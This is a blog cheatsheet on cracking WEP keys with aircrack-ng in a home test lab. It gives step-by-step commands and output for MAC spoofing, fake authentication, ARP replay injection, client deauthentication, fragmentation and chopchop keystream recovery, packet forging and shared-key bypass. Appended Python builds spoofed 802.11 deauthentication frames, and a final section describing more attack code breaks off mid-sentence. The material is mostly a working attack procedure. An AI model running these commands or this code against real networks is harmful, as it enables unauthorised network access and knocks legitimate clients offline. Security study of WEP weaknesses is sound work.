3/20/2010

Cheatsheet : Cracking WEP with Backtrack 4 and aircrack-ng

Peter Van Eeckhoutte's Blog
:: [Knowledge is not an object, it's a flow] ::
corelan.be:8800/…/cheatsheet‐cracking‐w… 1/14

February 20th, 2009 | Author: Peter Van Eeckhoutte

I know, there are probably already a zillion websites that show how to crack WEP, so I guess this will be website zillion+1 on learning how to audit your own WEP security. To be honest, the main reason I'm putting this info on this blog is that I just wanted it as a quick reference, or cheatsheet, in case I forget something about particular commands/parameters again :-) And why rely on other websites that may or may not be reachable when you need them :-)

Scenario 1 : WEP encryption, MAC filtering enabled, OPEN Authentication, active client on network

The AP in my testlab uses MAC filtering and is configured to use WEP with the OPEN Authentication method. I have 2 clients that are currently connected to the wireless network. My auditor laptop (an old IBM T22) runs backtrack 4 beta and has a PCMCIA wireless card (Proxim, Atheros chipset) and a D-Link USB wireless adapter (DWL-G122). Both adapters work just fine, however I get better results with the Proxim PCMCIA card because it has a range extender.

The process of cracking the WEP key for this scenario is :

- Put the wireless interface in monitor mode (airmon-ng start wireless_interface)
- Find the wireless network (channel, BSSID and ESSID) (airodump-ng wireless_interface_in_monitor_mode)
- Find a valid / connected client (MAC address)
- Wait until that client is gone and change your MAC address to the valid client MAC (airmon-ng stop wireless_int, ifconfig wireless_int down, macchanger -m XX:XX:XX:XX:XX:XX wireless_int, ifconfig wireless_int up, airmon-ng start wireless_int)
- Associate with the AP and inject ARP packets (airodump-ng -c <channel> --ivs -w /tmp/filename wireless_int_in_monitor_mode, aireplay-ng --fakeauth 0 -a <BSSID> -h <local MAC> -e <ESSID> wireless_int_in_monitor_mode, aireplay-ng -3 -b <BSSID> wireless_int_in_monitor_mode)
- If no ARP is found (and injected) in a reasonable amount of time, try to deauthenticate an existing client (aireplay-ng --deauth 0 -a <BSSID> -c <client MAC> wireless_int_in_monitor_mode)
- Save the IVs to a file and crack the key (aircrack-ng -0 -b <BSSID> /tmp/filename.ivs)

In all cases, in all scenarios, the most important component is verifying that you can associate with the AP. You'll learn some techniques on how to do this in this post.

But let's not jump ahead. First, list the adapters :

root@bt:~# airmon-ng

Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The wifi0 adapter is the Proxim PCMCIA card, wlan0 is the D-Link USB adapter. For this test, we'll use the Proxim card (wifi0). The MAC address of this card is 00:20:A6:4F:A9:41 (you can get the MAC address by running 'ifconfig wifi0').

First, put the card in monitor mode :

root@bt:~# airmon-ng start wifi0

Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

A new interface called "ath1" has been created. This interface is the one we are going to use in order to find the wireless networks, and the clients (if any) that are currently associated with an Access Point. Launch "airodump-ng ath1" to hop all channels and show the wireless networks that can be found :

root@bt:~# airodump-ng ath1

 CH  1 ][ Elapsed: 1 min ][ 2009-02-19 14:05

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:14:BF:89:9C:D3   34      104      0    0  11  54 . WEP  WEP         TestNet

 BSSID              STATION            PWR  Rate  Lost  Packets  Probe
 00:14:BF:89:9C:D3  00:1C:BF:90:5B:A3   55   0-1     0       12  TestNet
 00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   71   0-1    32      441  TestNet

Ok, so we have found a network with ESSID "TestNet", operating on channel 11. Apparently there are 2 clients connected to this AP. Let's see if we can associate with the Access Point with MAC (BSSID) 00:14:BF:89:9C:D3.

First, run airodump-ng again, but set it to look at channel 11 only. This is required for the AP association/authentication (via aireplay-ng) to operate on channel 11 as well (because you cannot specify the channel to use when running aireplay-ng) :

root@bt:/# airodump-ng --channel 11 ath1

Leave airodump-ng running for now and run the following aireplay-ng command to perform a 'fake authentication' attempt :

root@bt:~# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:20:A6:4F:A9:41)
14:14:50  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
14:14:50  Sending Authentication Request (Open System) [ACK]
14:14:50  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Authentication failed (code 1)
14:14:53  Sending Authentication Request (Open System) [ACK]
14:14:53  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Authentication failed (code 1)

Ok, authentication failed, so the AP does MAC filtering. We could try to use the MAC address of one of the clients that are already connected (by specifying its MAC address using the -h parameter), but we'll change the MAC address on our interface instead (which will make all future commands shorter).

First, kill the airodump-ng process and take wifi0 (ath1) out of monitor mode :

root@bt:~# airmon-ng stop ath1

Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

root@bt:~# airmon-ng

Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)

Bring wifi0 down, change the MAC address of wifi0, bring wifi0 up again and then put the interface back in monitor mode :

root@bt:~# ifconfig wifi0 down
root@bt:~# macchanger -m 00:1C:BF:90:5B:A3 wifi0
Current MAC: 00:20:a6:4f:a9:44 (Proxim, Inc.)
Faked MAC:   00:1c:bf:90:5b:a3 (unknown)
root@bt:~# ifconfig wifi0 up
root@bt:~# airmon-ng start wifi0

Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

root@bt:~# ifconfig ath1
ath1      Link encap:UNSPEC  HWaddr 00-1C-BF-90-5B-A3-D0-03-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:106 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:9448 (9.4 KB)  TX bytes:0 (0.0 B)

Ok, looks good.

Let's see if it makes a difference. Run airodump-ng again (airodump-ng -c 11 ath1) and then try to perform the fake authentication again :

root@bt:/# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:20:19  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
14:20:19  Sending Authentication Request (Open System) [ACK]
14:20:19  Authentication successful
14:20:19  Sending Association Request [ACK]
14:20:19  Association successful :-) (AID: 1)

Some APs require you to stay associated (or will disassociate you after a while). If you are connecting to an AP that is a bit picky, you have some options to tweak the aireplay-ng behaviour :

aireplay-ng -1 6000 -o 1 -q 12 -e TestNet -a 00:14:BF:89:9C:D3 ath1

-1 6000 = re-authenticate every 6000 seconds
-o 1 = only send one set of packets at a time
-q 12 = send keep-alive packets every 12 seconds (sometimes it works better without this last parameter)

From this point forward, you should be able to associate with the AP. If not, there's no use in continuing with the process.

Ok, now let's try to crack the key. First, stop the existing airodump-ng process and run airodump-ng with the option to save the IVs to a file (parameter -i or --ivs) :

root@bt:~# airodump-ng -c 11 -w /tmp/TestNetAudit1 -i ath1

 CH 11 ][ Elapsed: 12 s ][ 2009-02-19 14:24

 BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:14:BF:89:9C:D3   34 100      135      0    0  11  54 . WEP  WEP    OPN  TestNet

 BSSID              STATION            PWR  Rate  Lost  Packets  Probe
 00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   43   0-1    10       84  TestNet

The number of #Data packets is most likely still very low and does not go up as fast as we want it to. So we need to grab an ARP packet and inject it, thus increasing the number of data packets (and IVs) on the network. Launch aireplay-ng in ARP request replay mode :

root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:26:55  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Saving ARP requests in replay_arp-0219-142655.cap
You should also start airodump-ng to capture replies.
Read 243 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Leave this running and wait until an ARP request is seen. The tool will then automatically attempt to inject the ARP packets. It might take a couple of minutes before an ARP is seen. If you don't have a lot of time, it might help to associate yourself again :

aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1

If that does not generate the required ARP packet(s), then try to deauthenticate the existing clients (which may not work very well if the AP has MAC filtering enabled; if you have a second client MAC address, you can set your own MAC address to one of the clients and try to deauth the other client...). Keep aireplay-ng and airodump-ng running and run the deauth attack :

root@bt:/# aireplay-ng --deauth 0 -a 00:14:BF:89:9C:D3 ath1
14:38:15  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:38:15  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:16  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:17  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:17  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:18  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:19  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:19  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]

If this works, the valid client will be disconnected. When the client connects again (in most cases this happens automatically), you should see that the ARP injection process starts to work :

root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:39:08  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Saving ARP requests in replay_arp-0219-143908.cap
You should also start airodump-ng to capture replies.
Read 7951 packets (got 878 ARP requests and 589 ACKs), sent 7116 packets...(499 pps)

At the same time, you should start to see the number of data packets increasing rapidly :

 CH 11 ][ Elapsed: 7 mins ][ 2009-02-19 14:32 ]

 BSSID              PWR RXQ  Beacons   #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:14:BF:89:9C:D3   34  97     4582   41799  814  11  54 . WEP  WEP    OPN  TestNet

 BSSID              STATION            PWR  Rate  Lost  Packets  Probe
 00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   71   0-1    46     2495  TestNet
 00:14:BF:89:9C:D3  00:1C:BF:90:5B:A3   34  54-1     0    51017  TestNet

For a 128-bit WEP key, you'll probably need between 80,000 and 250,000 data packets. So if your coverage is good, the signal is strong and the injection works well, it may go very fast. By the time I wrote the last 2 lines of text, I had already captured 140,000 IVs, which appears to be sufficient to crack the key in one shot. However, you don't need to wait until you've gathered all those packets. You can already try to break the key using the ivs file that is being generated. As long as the key is not found and the number of packets keeps growing, the crack process will automatically re-read the file and attempt to crack the key again.

root@bt:/# aircrack-ng -0 -b 00:14:BF:89:9C:D3 /tmp/TestNetAudit1-01.ivs
Opening /tmp/TestNetAudit1-01.ivs
Reading packets, please wait...

                                 Aircrack-ng 1.0 rc2 r1415

                 [00:00:01] Tested 865 keys (got 140507 IVs)

   KB    depth   byte(vote)
    0    0/  1   A3(203120)
    1    0/  9   EA(193816)
    2    0/  1   D3(212716)
    3    7/  3   AA(153630)
    4   13/  4   DD(150086)

                 KEY FOUND! [ A3:EA:D3:AA:DD:73:22:AD:1F:23:31:AD:22 ]
        Decrypted correctly: 100%

If you would not have had enough IVs, the aircrack-ng process would just sit and wait until the file has grown bigger and would then attempt to crack the key again. In my case, the key was cracked in 1 second. The total process took about 10 minutes.

If the packet count all of a sudden stops increasing, then stop the injection process, re-associate, start it again, perhaps deauthenticate an existing client, and it should continue to grow.

The key is 26 characters, so if we assume that the key is in hex, we are dealing with 128-bit WEP. This mode is also called WEP104 (in case you forgot : WEP40 = 64-bit, WEP104 = 128-bit, WEP232 = 256-bit; the name is the secret key length, the advertised size adds the 24-bit IV).

Scenario 2 : WEP encryption, MAC filtering enabled (?), OPEN Authentication, no active clients

Ok, first of all, if MAC filtering is enabled and there are no active clients, it's going to be difficult to get a valid MAC address that is allowed to associate with the AP. I guess it makes the wireless network a bit safer, but a whole lot more useless as well :-) So assuming that there is no MAC filtering, or you have managed to get a valid MAC address of a client (earlier, or by brute-forcing MAC addresses :) ), then this is what you can do if there are no active clients connected to the network at the time of the audit :

- Put the wireless interface in monitor mode (airmon-ng start wireless_interface)
- Find the wireless network (BSSID and ESSID) (airodump-ng wireless_interface_in_monitor_mode)
- Associate with the AP (airodump-ng -c <channel> --ivs -w /tmp/filename wireless_int_in_monitor_mode, aireplay-ng --fakeauth 0 -a <BSSID> -h <local MAC> -e <ESSID> wireless_int_in_monitor_mode)
- Use the fragmentation or chopchop attack and generate a valid custom ARP packet (aireplay-ng -5 -b <BSSID> wireless_int_in_monitor_mode, aireplay-ng -4 -b <BSSID> -h <local MAC> wireless_int_in_monitor_mode, packetforge-ng ...)
- Inject the custom ARP packet (aireplay-ng -2 -r custom_arp_packet.file wireless_int_in_monitor_mode)
- Save the IVs to a file, crack the key, throw a party

The first 3 steps are similar to scenario 1. I'll assume that you are able to associate yourself with the AP (either using any MAC or using a valid MAC from the MAC filter list) and that you have airodump-ng running, capturing IVs to a file.

Let's try the fragmentation attack first (option -5) :

root@bt:~# aireplay-ng -5 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
18:29:43  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
18:29:43  Waiting for a data packet...

Read 3076 packets...

Wait until you are asked whether you want to use a packet that was captured. Review the packet (BSSID, destination MAC, source MAC) and make sure the packet comes from the Access Point. You should get "Got RELAYED packet!!" in order to be successful. Sometimes you will need to try a couple of times before the AP responds correctly :

root@bt:~# aireplay-ng -5 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
18:48:14  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
18:48:14  Waiting for a data packet...

        Size: 352, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:14:BF:89:9C:D3
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:14:BF:89:9C:D1

        --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0219-184930.cap
18:50:11  Data packet found!
18:50:11  Sending fragmented packet
18:50:11  Got RELAYED packet!!
18:50:11  Trying to get 384 bytes of a keystream
18:50:11  Got RELAYED packet!!
18:50:11  Trying to get 1500 bytes of a keystream
18:50:12  Got RELAYED packet!!
Saving keystream in fragment-0219-185011.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Ok, now you can use the .xor file to generate an ARP packet that can be injected and will help to get IVs. In this command, you will have to specify the local MAC address (so make sure to use the correct MAC address; if you are using a fake MAC, then use that fake MAC in the command) :

root@bt:~# packetforge-ng -0 -a 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0219-185011.xor -w /tmp/my-arp-request
Wrote packet to: /tmp/my-arp-request

Ok, now the ARP packet is ready. Let's inject it into the network :

root@bt:~# aireplay-ng -2 -r /tmp/my-arp-request ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:14:BF:89:9C:D3
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:1C:BF:90:5B:A3

Use this packet ? y

Enter "y" and see if the data packets are now increasing (switch to the airodump-ng output). In most cases, this attack works well. However, if you have not been able to successfully get a .xor file using this procedure, you can use the chopchop attack as well :

root@bt:~# aireplay-ng -4 -b 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
19:04:26  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Read 2938 packets...

        Size: 352, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:14:BF:89:9C:D3
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:14:BF:89:9C:D1

        --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0219-190538.cap

Sent 241 packets, current guess: F0...

Failure: got several deauthentication packets from the AP - try running another aireplay-ng with attack "-1" (fake open-system authentication).

If you get this message, run aireplay-ng --fakeauth in a second session while the chopchop attack is running.

session 1 : start the fakeauth

root@bt:~# aireplay-ng --fakeauth 6000 -o 1 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
19:08:49  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
19:08:49  Sending Authentication Request (Open System) [ACK]
19:08:49  Authentication successful
19:08:49  Sending Association Request [ACK]

19:08:49  Association successful :-) (AID: 1)
19:09:04  Sending keep-alive packet [ACK]
19:09:04  Got a deauthentication packet! (Waiting 3 seconds)
19:09:07  Sending Authentication Request (Open System) [ACK]
19:09:07  Authentication successful
19:09:07  Sending Association Request [ACK]
19:09:07  Association successful :-) (AID: 1)
19:09:22  Sending keep-alive packet [ACK]
19:09:22  Got a deauthentication packet! (Waiting 3 seconds)
19:09:25  Sending Authentication Request (Open System) [ACK]
19:09:25  Authentication successful
19:09:25  Sending Association Request [ACK]
19:09:25  Association successful :-) (AID: 1)
19:09:40  Sending keep-alive packet [ACK]
19:09:40  Got a deauthentication packet! (Waiting 3 seconds)
19:09:43  Sending Authentication Request (Open System) [ACK]
19:09:43  Authentication successful
19:09:43  Sending Association Request [ACK]
19:09:43  Association successful :-) (AID: 1)
19:09:45  Got a deauthentication packet! (Waiting 3 seconds)
19:09:48  Sending Authentication Request (Open System) [ACK]
19:09:48  Authentication successful
19:09:48  Sending Association Request [ACK]
19:09:48  Association successful :-) (AID: 1)
19:10:03  Sending keep-alive packet [ACK]
19:10:18  Sending keep-alive packet [ACK]
19:10:33  Sending keep-alive packet [ACK]
19:10:48  Sending keep-alive packet [ACK]
19:11:03  Sending keep-alive packet [ACK]

session 2 : run chopchop while the fakeauth is running

Enter "y" to select a packet. This process can take multiple minutes. Don't worry, as long as it keeps running, you're fine. Wait until the process has reached 100% and you should have your .xor file :

root@bt:~# aireplay-ng -4 -b 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
19:08:55  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Read 1841 packets...

        Size: 352, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:14:BF:89:9C:D3
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:14:BF:89:9C:D1

        --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0219-190940.cap

Offset  351 ( 0% done) | xor = 4C | pt = 88 |  637 frames written in 12991ms
Offset  350 ( 0% done) | xor = A0 | pt = F0 |   26 frames written in   530ms
Offset  349 ( 0% done) | xor = 0D | pt = 6E |  123 frames written in  2502ms
Offset  348 ( 0% done) | xor = D7 | pt = C3 |  174 frames written in  3555ms
Offset  347 ( 1% done) | xor = C7 | pt = 0A |   36 frames written in   734ms
Offset  346 ( 1% done) | xor = 92 | pt = 0D |  236 frames written in  4800ms
Offset  345 ( 1% done) | xor = 1C | pt = 0A |  139 frames written in  2820ms
Offset  344 ( 2% done) | xor = 62 | pt = 0D |   77 frames written in  1576ms
Offset  343 ( 2% done) | xor = 18 | pt = 65 |  226 frames written in  4587ms
Offset  342 ( 2% done) | xor = 18 | pt = 63 |  133 frames written in  2718ms
Offset  341 ( 3% done) | xor = 22 | pt = 69 |  133 frames written in  2722ms
Offset  340 ( 3% done) | xor = D4 | pt = 76 |  205 frames written in  4171ms
Offset  339 ( 3% done) | xor = 31 | pt = 65 |   72 frames written in  1465ms
Offset   59 (91% done) | xor = 25 | pt = 6C |  108 frames written in  2196ms
Offset   58 (92% done) | xor = CF | pt = 07 |   46 frames written in   938ms
Offset   57 (92% done) | xor = 5A | pt = CC |   20 frames written in   420ms
Offset   56 (92% done) | xor = 2B | pt = 09 |  164 frames written in  3346ms
Offset   55 (93% done) | xor = C1 | pt = FA |   10 frames written in   204ms
Offset   54 (93% done) | xor = 25 | pt = FF |  257 frames written in  5224ms
Offset   53 (93% done) | xor = B1 | pt = FF |  133 frames written in  2722ms
Offset   52 (94% done) | xor = 87 | pt = EF |   61 frames written in  1245ms
Offset   51 (94% done) | xor = 17 | pt = 01 |  175 frames written in  3563ms
Offset   50 (94% done) | xor = 2C | pt = 06 |  205 frames written in  4171ms
Offset   49 (94% done) | xor = BD | pt = A8 |  241 frames written in  4909ms
Offset   48 (95% done) | xor = 3D | pt = C0 |  179 frames written in  3653ms
Offset   47 (95% done) | xor = 87 | pt = 11 |   36 frames written in   735ms
Offset   46 (95% done) | xor = 6C | pt = F6 |  180 frames written in  3657ms
Offset   45 (96% done) | xor = 94 | pt = 11 |  199 frames written in  4073ms
Offset   44 (96% done) | xor = 2F | pt = 01 |  236 frames written in  4812ms
Offset   43 (96% done) | xor = D9 | pt = 00 |  103 frames written in  2085ms
Offset   42 (97% done) | xor = 6C | pt = 00 |   87 frames written in  1783ms
Offset   41 (97% done) | xor = 94 | pt = 00 |   98 frames written in  1975ms
Offset   40 (97% done) | xor = F8 | pt = 0C |   20 frames written in   420ms
Offset   39 (98% done) | xor = 6A | pt = 38 |  113 frames written in  2306ms
Offset   38 (98% done) | xor = 7E | pt = 01 |  231 frames written in  4698ms
Offset   37 (98% done) | xor = 94 | pt = 00 |  236 frames written in  4799ms
Offset   36 (99% done) | xor = FC | pt = 45 |   20 frames written in   420ms
Offset   35 (99% done) | xor = 5E | pt = 00 |  231 frames written in  4701ms
Offset   34 (99% done) | xor = 5A | pt = 08 |  148 frames written in  3032ms

Saving plaintext in replay_dec-0219-192452.cap
Saving keystream in replay_dec-0219-192452.xor
Completed in 907s (0.35 bytes/s)

The pt column is the plaintext recovered one byte at a time from the end of the packet, so you can sanity-check it: read upward, offsets 34 to 59 are 08 00 45 00 01 38 ... 01 11 ... C0 A8 06 01 EF FF FF FA 09 CC 07 6C, an IPv4/UDP header from 192.168.6.1 to 239.255.255.250 with destination port 1900, and offsets 339 to 347 end in "evice" followed by two CRLFs. The chosen multicast frame was an SSDP (UPnP) announcement, which matches its destination MAC 01:00:5E:7F:FF:FA.

Follow the same steps that were used when we created a .xor file using the fragmentation attack : create an ARP packet (packetforge-ng), inject the packet (aireplay-ng), capture the IVs and crack the key.

root@bt:~# packetforge-ng -0 -a 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0219-192452.xor -w /tmp/my-2nd-arp-request
Wrote packet to: /tmp/my-2nd-arp-request

Inject :

root@bt:~# aireplay-ng -2 -r /tmp/my-2nd-arp-request ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:14:BF:89:9C:D3
          Dest. MAC  =  FF:FF:FF:FF:FF:FF

         Source MAC  =  00:1C:BF:90:5B:A3

Use this packet ? y

Verify that the number of #Data packets increases fast. In most cases, this will kick off the data packet increase again. Note : if the number of packets stops increasing, just stop sending packets, re-associate (fake auth) and start sending packets again. Wait a couple of minutes and start cracking.

Scenario 3 : WEP encryption, Shared Key Authentication instead of OPEN

What if the AP does not use OPEN authentication, but uses Shared Key Authentication ? Well, aireplay-ng --fakeauth will not just work... It will detect that Open System cannot be used and will then switch to shared key authentication :

20:15:01  Sending Authentication Request (Open System) [ACK]
20:15:01  Switching to shared key authentication

To complete a shared key authentication it needs the keystream (PRGA) of a real client's challenge/response, so it has to see a client successfully authenticate to the AP first. As long as no client has authenticated, the AUTH column in airodump-ng will stay empty; after a client has connected, the column will state SKA. When Shared Key is used, that captured exchange is what you use to do the fake auth. First, launch airodump-ng and write all data to disk (airodump-ng -w /tmp/filesout ath1). When a client authenticates, airodump-ng will write a .xor file to disk, containing the PRGA keystream bits. Of course, if it takes too long before a client authenticates, you can try to deauthenticate an existing client (if any). Once the .xor file is saved on disk, you can attempt to do the fake auth by providing the .xor file :

root@bt:/tmp# aireplay-ng -1 0 -e TestNet -y /tmp/filesout.xor -a 00:19:5B:52:AD:F7 ath1
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
20:23:58  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
20:23:58  Sending Authentication Request (Shared Key) [ACK]
20:23:58  Authentication 1/2 successful
20:23:58  Sending encrypted challenge. [ACK]
20:23:58  Authentication 2/2 successful
20:23:58  Sending Association Request [ACK]
20:23:58  Association successful :-) (AID: 1)

Hooray, from this point forward you can use the same techniques as explained in the first 2 scenarios.
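The deauthentication step in scenario 1 (aireplay-ng --deauth, with or without -c <client MAC>) works because a station on a WEP network honours any deauthentication management frame that carries its BSSID and is addressed to it or to the broadcast address; nothing in the frame proves it came from the AP. The Python below is an added example written for this page (not code from the post or from aircrack-ng) that builds and decodes such a frame, so you can see what "Sending DeAuth to broadcast" versus a -c targeted frame puts on the air. The post's lab addresses are reused as constructed input; the duration field, sequence number and reason code 7 are assumptions, not values read from the post.

```python
"""802.11 deauthentication frames like the ones aireplay-ng --deauth sends.

Added example for this page; not the post's code and not aircrack-ng's.
Addresses are the post's lab values reused as constructed input; duration,
sequence number and reason code are assumptions."""
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
# Frame control: protocol version 0, type 0 (management), subtype 12 (deauthentication).
FC_DEAUTH = 0x00C0
# Reason 7 = "class 3 frame received from nonassociated STA"; assumed here as a typical choice.
REASON_CLASS3 = 7


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def build_deauth(bssid: str, target: str = BROADCAST, seq: int = 0, reason: int = REASON_CLASS3) -> bytes:
    """addr1 = receiver (one client, or broadcast for everyone), addr2 = transmitter,
    addr3 = BSSID. Spoofing the AP is just writing its MAC into addr2/addr3."""
    header = (struct.pack("<HH", FC_DEAUTH, 0)          # frame control, duration (assumed 0)
              + mac_bytes(target) + mac_bytes(bssid) + mac_bytes(bssid))
    seq_ctrl = struct.pack("<H", (seq & 0xFFF) << 4)   # fragment 0, sequence number in the top 12 bits
    return header + seq_ctrl + struct.pack("<H", reason)


def parse_deauth(frame: bytes) -> dict:
    """Decode a deauth frame; raises ValueError for anything else."""
    if len(frame) < 26:
        raise ValueError("frame too short for a deauthentication frame")
    fc, _duration = struct.unpack("<HH", frame[:4])
    if fc & 0x00FF != FC_DEAUTH:                        # ignore the flags byte, check version/type/subtype
        raise ValueError("not a deauthentication frame: fc=0x%04x" % fc)
    seq_ctrl, reason = struct.unpack("<HH", frame[22:26])
    return {
        "receiver": mac_str(frame[4:10]),
        "transmitter": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "seq": seq_ctrl >> 4,
        "reason": reason,
        "targeted": frame[4:10] != b"\xff" * 6,
    }


def affects(frame: bytes, client_mac: str, bssid: str) -> bool:
    """Would this station drop its association on receiving the frame? It does if the
    frame carries its BSSID and is addressed to it or to broadcast; without 802.11w
    management frame protection the transmitter address is never verified."""
    d = parse_deauth(frame)
    return (d["bssid"] == mac_str(mac_bytes(bssid))
            and d["receiver"] in (BROADCAST, mac_str(mac_bytes(client_mac))))


if __name__ == "__main__":
    everyone = build_deauth("00:14:BF:89:9C:D3")
    one = build_deauth("00:14:BF:89:9C:D3", target="00:19:5B:52:AD:F7", seq=5)
    print(parse_deauth(everyone))
    print(parse_deauth(one), affects(one, "00:1C:BF:90:5B:A3", "00:14:BF:89:9C:D3"))
```

With -c, aireplay-ng puts the client's MAC in addr1 instead of the broadcast address (and also sends the matching frame in the other direction, client to AP), which is why the tool prints that a targeted deauth is more effective: a driver may rate-limit or ignore broadcast deauths, but one addressed to it is rarely ignored. The only real countermeasure is 802.11w (protected management frames), which WEP networks cannot use; on anything pre-802.11w, `affects()` returning True is the whole story.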
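Scenario 2 and scenario 3 rest on one property of WEP: the RC4 keystream for a given IV, once recovered, can be reused to encrypt anything under that IV, because WEP has no replay protection and its ICV is a plain CRC-32 computed on the plaintext. The fragmentation and chopchop attacks recover that keystream and save it as the .xor file, packetforge-ng reuses it to build an ARP request with a valid ICV, and in scenario 3 the shared key challenge/response hands the attacker 132 bytes of it directly (that is the .xor airodump-ng writes and aireplay-ng -1 -y replays). The Python below is an added example written for this page, not the post's code and not aircrack-ng's: a WEP encrypt/decrypt pair standing in for the AP, keystream recovery from known plaintext, a forged ARP request that decrypts correctly under a key the attacker never sees, and a shared key fake authentication answered with a captured keystream. The key, IV, challenge bytes and addresses are constructed for the demo, and only the encrypted body of a frame is modelled (IV, key-id byte, RC4 data), not the 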